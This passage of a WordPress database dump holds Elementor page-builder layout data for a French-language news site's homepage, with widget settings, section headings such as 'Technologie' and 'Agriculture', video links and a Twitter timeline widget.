line_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1yw1wzs\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5g2v9n5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aqja4ox\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1555,520,'_elementor_version','0.4'),(1560,522,'_elementor_edit_mode','builder'),(1561,522,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{